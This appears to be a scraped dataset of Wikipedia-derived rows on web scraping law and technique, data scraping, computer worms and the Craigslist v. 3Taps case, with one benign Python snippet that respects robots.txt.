cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system, and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc. in the United States District Court for the Eastern District of Virginia, the court ruled that the terms of use should be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleged that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 to 300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA), a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider it in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
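The row above ends just before its list of administrator counter-measures, but the scraping side of that exchange can at least check robots.txt and throttle itself. A minimal courtesy sketch using requests plus the standard library (the URL and user-agent string are placeholders, and honoring robots.txt is not a guarantee of compliance with a site's terms of service):

import time
from urllib.parse import urljoin
from urllib.robotparser import RobotFileParser
import requests

def polite_get(url, user_agent="ExampleResearchBot/0.1", delay=2.0):
    """Fetch a URL only if robots.txt allows it, then pause briefly."""
    robots_url = urljoin(url, "/robots.txt")
    rp = RobotFileParser()
    rp.set_url(robots_url)
    rp.read()
    if not rp.can_fetch(user_agent, url):
        raise PermissionError(f"robots.txt disallows fetching {url}")
    response = requests.get(url, headers={"User-Agent": user_agent}, timeout=10)
    time.sleep(delay)   # simple rate limiting between requests
    return response

# Placeholder URL, for illustration only:
# r = polite_get("https://example.com/listings")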
404 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:Citation_needed | To ensure that all Wikipedia content is verifiable, Wikipedia provides a means for anyone to question an uncited claim. If your work has been tagged, please provide a reliable source for the statement, and discuss if needed. You can add a citation by selecting from the drop-down menu at the top of the editing box. In markup, you can add a citation manually using <ref> tags. There are also more elaborate ways to cite sources. In wiki markup, you can question an uncited claim by inserting a simple {{Citation needed}} tag, or a more comprehensive {{Citation needed|reason=Your explanation here|date=August 2024}}. Alternatively, {{fact}} and {{cn}} will produce the same result. These all display as: Example: 87 percent of statistics are made up on the spot. citation needed For information on adding citations in articles, see Help:Referencing for beginners. For information on when to remove this template message, see Help:Maintenance template removal. A "citation needed" tag is a request for another editor to supply a source for the tagged fact: a form of communication between members of a collaborative editing community. It is never, in itself, an "improvement" of an article. Though readers may be alerted by a "citation needed" that a particular statement is not supported, and even doubted by some, many readers don't fully understand the community's processes. Not all tags get addressed in a timely manner, staying in place for months or years, forming an ever-growing Wikipedia backlog—this itself can be a problem. Best practice recommends the following: Before adding a tag, at least consider the following alternatives, one of which may prove much more constructive: There are 524,016 articles with "Citation needed" statements. You can browse the whole list of these articles at Category:All articles with unsourced statements. Frequently the authors of statements do not return to Wikipedia to support the statement with citations, so other Wikipedia editors have to do work checking those statements. With 524,016 articles containing statements that need WP:Verification, sometimes it's hard to choose which article to work on. The tool Citation Hunt makes that easier by suggesting random articles, which you can sort by topical category membership. |
405 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#See_also | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer-to-user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise (change control, security, user management, data protection, operational audit, load balancing, queue management, and so on), could be said to be an example of robotic process automation software, called RPA, or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24x80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data into numeric data for inclusion in calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally, Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or, for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation of these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the web server. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
402 | https://en.wikipedia.org/wiki/Data_scraping | https://www.worldcat.org/issn/1683-1470 | WorldCat is the world’s largest library catalog, helping you find library materials online. |
407 | https://en.wikipedia.org/wiki/Web_scraping | https://es.wikipedia.org/wiki/Web_scraping | Web scraping, or "raspado web", is a technique that uses software programs to extract information from websites. 1 Usually, these programs simulate a human browsing the World Wide Web, either by using the HTTP protocol manually or by embedding a browser in an application. Web scraping is closely related to web indexing, which indexes information on the web using a robot and is a universal technique adopted by most search engines. However, web scraping focuses more on transforming unstructured data on the web (such as HTML) into structured data that can be stored and analyzed in a central database, a spreadsheet, or some other storage medium. Some uses of web scraping are price comparison across shops, monitoring weather-related data for a given region, detecting changes in websites, and integrating data across websites. It is also used to obtain relevant information from a site through rich snippets. A web scraper uses a website's URL to extract data, storing it in a local or central database or spreadsheet for later analysis. This method of web scraping allows data to be extracted efficiently and accurately. 2 In recent years, web scraping has become a widely used technique in the search engine optimization sector, thanks to its ability to generate large amounts of data for creating quality content. 3 Web scraping is the process of automatically collecting information from the Web. It is a field with active developments, sharing a common goal with the semantic web vision. It uses practical solutions based on existing technologies that are commonly ad hoc. Existing web scraping technologies can provide different levels of automation: Web scraping may go against the terms of use of some websites. The enforceability of these terms is not entirely clear. 5 While the duplication of original expression may in many cases be illegal, in the United States the court ruled in Feist Publications v. Rural Telephone Service that the duplication of facts is allowed. U.S. courts have on occasion recognized that certain uses of scrapers should not be permitted. A computer may be considered personal property, and the scraper would then be trespassing on that property. In the best-known case, eBay vs Bidder's Edge, the latter company had to stop making automated requests to eBay's site. In that case, Bidder's Edge automatically bid on certain products on the site. One of the main scraping tests involved American Airlines and a company called FareChase. American Airlines won this battle, forcing FareChase to stop selling software that allowed users to compare fares online if the American Airlines site was included. The airline said that FareChase's searches trespassed on its servers when they collected the publicly available information. 
Although the decisions made so far are not uniform, it is difficult to ignore that a pattern is emerging in which the courts are preparing to protect proprietary content on commercial websites, thereby preventing it from being used without the consent of the sites' owners. However, the degree of protection for such content is not yet established, and will depend on the type of access carried out by the scrapers, the amount of information collected, and the degree to which these factors affect the website owner. The administrator of a website can use various techniques to stop or slow scraper requests. Some techniques include: Most of these methods entail a significant reduction in the usability of the website in question, and the benefits may be very limited. Despite the negative view held by some sectors, automated crawling and scraping are very important for preserving the history of the Internet. Web archiving initiatives rely mostly on this technique. |
408 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=7 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
409 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_worm | A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. 1 It often uses a computer network to spread itself, relying on security failures on the target computer to access it. It will use this machine as a host to scan and infect other computers. When these new worm-invaded computers are controlled, the worm will continue to scan and infect other computers using these computers as hosts, and this behaviour will continue. 2 Computer worms use recursive methods to copy themselves without host programs and distribute themselves based on exploiting the advantages of exponential growth, thus controlling and infecting more and more computers in a short time. 3 Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer. Many worms are designed only to spread, and do not attempt to change the systems they pass through. However, as the Morris worm and Mydoom showed, even these "payload-free" worms can cause major disruption by increasing network traffic and other unintended effects. The term "worm" was first used in John Brunner's 1975 novel, The Shockwave Rider. In the novel, Nichlas Haflinger designs and sets off a data-gathering worm in an act of revenge against the powerful men who run a national electronic information web that induces mass conformity. "You have the biggest-ever worm loose in the net, and it automatically sabotages any attempt to monitor it. There's never been a worm with that tough a head or that long a tail." 4 "Then the answer dawned on him, and he almost laughed. Fluckner had resorted to one of the oldest tricks in the store and turned loose in the continental net a self-perpetuating tapeworm, probably headed by a denunciation group "borrowed" from a major corporation, which would shunt itself from one nexus to another every time his credit-code was punched into a keyboard. It could take days to kill a worm like that, and sometimes weeks." 4 The second-ever computer worm was devised to be anti-virus software. Named Reaper, it was created by Ray Tomlinson to replicate itself across the ARPANET and delete the experimental Creeper program (the first computer worm, 1971). On November 2, 1988, Robert Tappan Morris, a Cornell University computer science graduate student, unleashed what became known as the Morris worm, disrupting many computers then on the Internet, guessed at the time to be one tenth of all those connected. 5 During the Morris appeal process, the U.S. Court of Appeals estimated the cost of removing the worm from each installation at between $200 and $53,000; this work prompted the formation of the CERT Coordination Center 6 and the Phage mailing list. 7 Morris himself became the first person tried and convicted under the 1986 Computer Fraud and Abuse Act. 8 Conficker, a computer worm discovered in 2008 that primarily targeted Microsoft Windows operating systems, is a worm that employs three different spreading strategies: local probing, neighborhood probing, and global probing. 9 This worm was considered a hybrid epidemic and affected millions of computers. The term "hybrid epidemic" is used because of the three separate methods it employed to spread, which was discovered through code analysis. 10 Independence: Computer viruses generally require a host program. 
11 The virus writes its own code into the host program. When the program runs, the written virus program is executed first, causing infection and damage. A worm does not need a host program, as it is an independent program or code chunk. Therefore, it is not restricted by the host program, but can run independently and actively carry out attacks. 12 13 Exploit attacks: Because a worm is not limited by the host program, worms can take advantage of various operating system vulnerabilities to carry out active attacks. For example, the "Nimda" virus exploits vulnerabilities to attack. Complexity: Some worms are combined with web page scripts, and are hidden in HTML pages using VBScript, ActiveX and other technologies. When a user accesses a webpage containing a virus, the virus automatically resides in memory and waits to be triggered. There are also some worms that are combined with backdoor programs or Trojan horses, such as "Code Red". 14 Contagiousness: Worms are more infectious than traditional viruses. They not only infect local computers, but also all servers and clients on the network based on the local computer. Worms can easily spread through shared folders, e-mails, 15 malicious web pages, and servers with a large number of vulnerabilities in the network. 16 Any code designed to do more than spread the worm is typically referred to as the "payload". Typical malicious payloads might delete files on a host system (e.g., the ExploreZip worm), encrypt files in a ransomware attack, or exfiltrate data such as confidential documents or passwords. citation needed Some worms may install a backdoor. This allows the computer to be remotely controlled by the worm author as a "zombie". Networks of such machines are often referred to as botnets and are very commonly used for a range of malicious purposes, including sending spam or performing DoS attacks. 17 18 19 Some special worms attack industrial systems in a targeted manner. Stuxnet was primarily transmitted through LANs and infected thumb-drives, as its targets were never connected to untrusted networks, like the internet. This virus can destroy the core production control computer software used by chemical, power generation and power transmission companies in various countries around the world - in Stuxnet's case, Iran, Indonesia and India were hardest hit - and it was used to "issue orders" to other equipment in the factory, and to hide those commands from being detected. Stuxnet used multiple vulnerabilities and four different zero-day exploits 1 in Windows systems and Siemens SIMATIC WinCC systems to attack the embedded programmable logic controllers of industrial machines. Although these systems operate independently from the network, if the operator inserts a virus-infected drive into the system's USB interface, the virus will be able to gain control of the system without any other operational requirements or prompts. 20 21 22 Worms spread by exploiting vulnerabilities in operating systems. Vendors with security problems supply regular security updates 23 (see "Patch Tuesday"), and if these are installed on a machine, then the majority of worms are unable to spread to it. If a vulnerability is disclosed before the security patch is released by the vendor, a zero-day attack is possible. Users need to be wary of opening unexpected emails, 24 25 and should not run attached files or programs, or visit web sites that are linked to such emails. 
However, as with the ILOVEYOU worm, and with the increased growth and efficiency of phishing attacks, it remains possible to trick the end-user into running malicious code. Anti-virus and anti-spyware software are helpful, but must be kept up-to-date with new pattern files at least every few days. The use of a firewall is also recommended. Users can minimize the threat posed by worms by keeping their computers' operating system and other software up to date, avoiding opening unrecognized or unexpected emails and running firewall and antivirus software. 26 Mitigation techniques include: Infections can sometimes be detected by their behavior - typically scanning the Internet randomly, looking for vulnerable hosts to infect. 27 28 In addition, machine learning techniques can be used to detect new worms, by analyzing the behavior of the suspected computer. 29 A helpful worm or anti-worm is a worm designed to do something that its author feels is helpful, though not necessarily with the permission of the executing computer's owner. Beginning with the first research into worms at Xerox PARC, there have been attempts to create useful worms. Those worms allowed John Shoch and Jon Hupp to test the Ethernet principles on their network of Xerox Alto computers. 30 Similarly, the Nachi family of worms tried to download and install patches from Microsoft's website to fix vulnerabilities in the host system by exploiting those same vulnerabilities. 31 In practice, although this may have made these systems more secure, it generated considerable network traffic, rebooted the machine in the course of patching it, and did its work without the consent of the computer's owner or user. Regardless of their payload or their writers' intentions, security experts regard all worms as malware. Another example of this approach is Roku OS patching a bug allowing for Roku OS to be rooted via an update to their screensaver channels, which the screensaver would attempt to connect to the telnet and patch the device. 32 One study proposed the first computer worm that operates on the second layer of the OSI model (Data link Layer), utilizing topology information such as Content-addressable memory (CAM) tables and Spanning Tree information stored in switches to propagate and probe for vulnerable nodes until the enterprise network is covered. 33 Anti-worms have been used to combat the effects of the Code Red, 34 Blaster, and Santy worms. Welchia is an example of a helpful worm. 35 Utilizing the same deficiencies exploited by the Blaster worm, Welchia infected computers and automatically began downloading Microsoft security updates for Windows without the users' consent. Welchia automatically reboots the computers it infects after installing the updates. One of these updates was the patch that fixed the exploit. 35 Other examples of helpful worms are "Den Zuko", "Cheeze", "CodeGreen", and "Millenium". 35 Art worms support artists in the performance of massive scale ephemeral artworks. It turns the infected computers into nodes that contribute to the artwork. 36 |
410 | https://en.wikipedia.org/wiki/Data_scraping | https://ar.wikipedia.org/wiki/%D8%AA%D8%AC%D8%B1%D9%8A%D9%81_%D8%A7%D9%84%D8%A8%D9%8A%D8%A7%D9%86%D8%A7%D8%AA | (Arabic-language article on data scraping; the non-Latin body text was stripped by the cleaning step, so no usable content remains for this row) |
411 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Craigslist_v._3Taps | Craigslist Inc. v. 3Taps Inc., 942 F.Supp.2d 962 (N.D. Cal. 2013) was a Northern District of California Court case in which the court held that sending a cease-and-desist letter and enacting an IP address block is sufficient notice of online trespassing, which a plaintiff can use to claim a violation of the Computer Fraud and Abuse Act. 3Taps and PadMapper were companies that partnered to provide an alternative user interface for browsing Craigslist's housing ads. In doing so, they scraped Craigslist's site for data, which Craigslist did not approve of. Craigslist sent both companies a cease-and-desist letter and blocked their IP addresses, but this did not stop 3Taps from scraping through other IP addresses. Craigslist then sued, resulting in this case. In pre-trial motions 3Taps moved to dismiss the lawsuit on multiple grounds. In response, the court issued an order that set precedent on whether online hosts can use the CFAA to protect public data. The court held that sending a cease and desist letter and blocking a client's IP address are sufficient to qualify as notice under the Computer Fraud and Abuse Act. The court also held that 3Taps should have known that Craigslist was revoking its authorization to access the site. 1 The motion to dismiss was granted in part, and denied in part. On June 26, 2015, Craigslist came to separate settlements with 3Taps and Padmapper. 2 Both settlements required the defendants to permanently stop taking content from Craigslist, directly or indirectly. 3Taps paid $1,000,000 which Craigslist will donate to the EFF over ten years. Press coverage said that 3Taps would shut down, but as of July 16 it was still active with content from other sites. Craigslist is a website where users post and browse classified ads for, among other things, housing. PadMapper is a website specialized for browsing housing ads. PadMapper collected data from Craigslist and offered a map of the ads. 3 3Taps, a data scraping and hosting company, was also collecting data from Craigslist as part of a larger effort to gather public datasets. 4 On 22 June 2012, Craigslist sent a cease-and-desist letter to PadMapper, requesting that PadMapper stop scraping Craigslist's real estate listings. 3 Earlier in 2010, Craigslist's founder Craig Newmark had written that "we take issue with only services which consume a lot of bandwidth. 5 6 Craigslist also blocked PadMapper's and 3Taps's IP addresses from accessing its site, causing a significant drop in traffic to PadMapper. 3 3Taps continued to collect data from Craigslist by accessing the site through proxies, which allowed it to conceal its IP address and bypass Craigslist's block. 1 On 9 July 2012, PadMapper restored its site by getting its data from 3Taps instead of directly from Craigslist. 3 On July 16, 2012 Craigslist changed their terms of service to claim exclusive ownership, and exclusive right to enforce copyright of all postings made by users. Craigslist later rescinded these changes under pressure from the Electronic Frontier Foundation and others on August 8, 2012. 7 On 20 July 2012, Craigslist sued both PadMapper and 3Taps. 
Craigslist's complaint specified several reasons that 3Taps's continued use of Craigslist was unlawful: it was in violation of the Computer Fraud and Abuse Act; it was a breach of Craigslist's terms of service contract; it infringed on Craigslist's copyright of the listings; it was also contributory copyright infringement, since 3Taps shared the listings with PadMapper; and it infringed on and diluted Craigslist's trademark. 3 3Taps opposed the claim that it violated the CFAA. 4 On July 12, 2013 the Electronic Frontier Foundation filed an amicus brief in support of PadMapper and 3Taps. 8 9 On April 29, 2013 the court denied 3Taps' motion to dismiss Craigslists's CFAA claim. Most importantly the court held that Craigslist could continue its damages claim on posts made between July 16, 2012 and August 8, 2012. This was the period during which Craigslist had modified its terms of service to claim exclusive copyright on all postings. 7 3Taps provided three reasons for dismissing the claim which the court granted in part, and dismissed in part. 1 First, 3Taps argued that it had Craigslist's authorization to access the listings. The CFAA claim only applies to access of a protected computer system without authorization. It claimed that Craigslist was a public website, so anyone, including 3Taps, always had authorization. The court disagreed with this, stating that although Craigslist had granted 3Taps authorization initially, it then revoked the authorization. The court cited the case LVRC Holdings v. Brekka, in which the Ninth Circuit held that a former employee of an employer no longer had the employer's authorization to log into a work computer. Thus, the court held that 3Taps was unauthorized when it continued to access Craigslist after Craigslist rescinded the authorization. 1 Second, 3Taps suggested that Craigslist had set restrictions on how 3Taps must use the data, rather than restricting 3Taps's access to the data altogether. 3Taps cited the Ninth Circuit's sentiment from United States v. Nosal that violating a use policy was less severe than violating an access restriction. The argument in Nosal was that use policies could be complex, while denying access is simple and easy to follow. Thus, it would be dangerous for the court to criminalize use violations. 3Taps likened Nosal to its own case, alleging that Craigslist had taken measures to prevent 3Taps from using the listings in a certain way, rather than enacting a straightforward access revocation. The court viewed it differently: it considered Craigslist's cease-and-desist letter and IP blocking as access revocation. 1 The court pointed to language Craigslist's cease-and-desist letter affirming its interpretation, "You ... are hereby prohibited from accessing and using the CL Services for any reason. 10 Third, 3Taps warned of negative consequences of a decision that criminalizes a vague access restriction. It criticized Craigslist's enforcement as unclear about what exactly what it was prohibiting. 3Taps stated that an ordinary user would be more likely to misunderstand Cragslist's IP blocking than, for example, a system that required a password to gain access. The court found this not of much concern, highlighting that the personalized cease-and-desist letter and subsequent lawsuit provided adequate notice and information. This, the court found, would be sufficient in differentiating the case from more benign incidents where a user accidentally stumbles upon a protected system. 
The court admitted that it could not comment on whether it would consider Craigslist's IP blocking to be effective, but considered the fact that 3Taps went out of its way to bypass it as enough evidence that 3Taps acted without authorization. 1 3Taps also said that this decision would be a judgment on Internet culture. It promoted the idea of publicly accessible websites as a great social benefit, which a decision for permission controls would harm. It claimed that the CFAA was meant to protect private information against malicious hackers, and that it was not meant to limit the social benefit created by public data. It also predicted that a broad interpretation of the CFAA would limit competition and harm innovation, ultimately harming the openness of the Internet. The court refused to make a judgement on these matters; it considered those matters to be better handled through legislation. The court likened its decision to allowing a store to open itself to the public but also to ban a disruptive person if it needed to. 1 The court, in many instances, pointed to Craigslist's cease-and-desist letter as evidence that 3Taps knew that its authorization had been revoked. Law professor Eric Goldman questioned this, stating that cease-and-desist letters are wish lists by the senders. They describe what the sender wants to happen. As such they may easily overstate what a defendant must lawfully do. Goldman found it troubling that the court had treated the cease and desist letter as a legally-binding document that revoked 3Taps's authorization to access Craigslist. 11 12 Critics of the decision have called it anti-competitive. They claimed that this case sets a precedent that allows businesses to use the CFAA to keep public data away from competitors. Further, they highlighted that such a holding sets a precedent of marginalizing the public good for the prosperity of a single business. 11 13 The case has also brought criticism towards Craigslist for enforcing its exclusive copyright of user-generated content. The critics pointed out that the entire lawsuit depended on a short, one-week-long period where Cragslist's terms of use required that users assign Craigslist the exclusive copyright of any posted content. 12 14 While some users may be happy to have other companies use their classified ads, another reaction was that there may also be users who do not want it. Craigslist would be under similar criticism if it had allowed the sharing and violated these users' privacy expectations. 13 The Electronic Frontier Foundation was critical of the court's decision to uphold Craiglist's copyright claim in their temporary terms of service between July 26, 2012 and August 8, 2012. Stating, "claiming an exclusive license to users' posts to the exclusion of everyone—including the original poster—threatens both innovation and users’ rights, and, even worse, sets terrible precedent. 15 In a related case, in 2017 Craigslist was awarded US 60,56 million in compensation for RadPad s unlawful use of data acquired from 3Taps in 2013. 16 |
412 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-18 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In 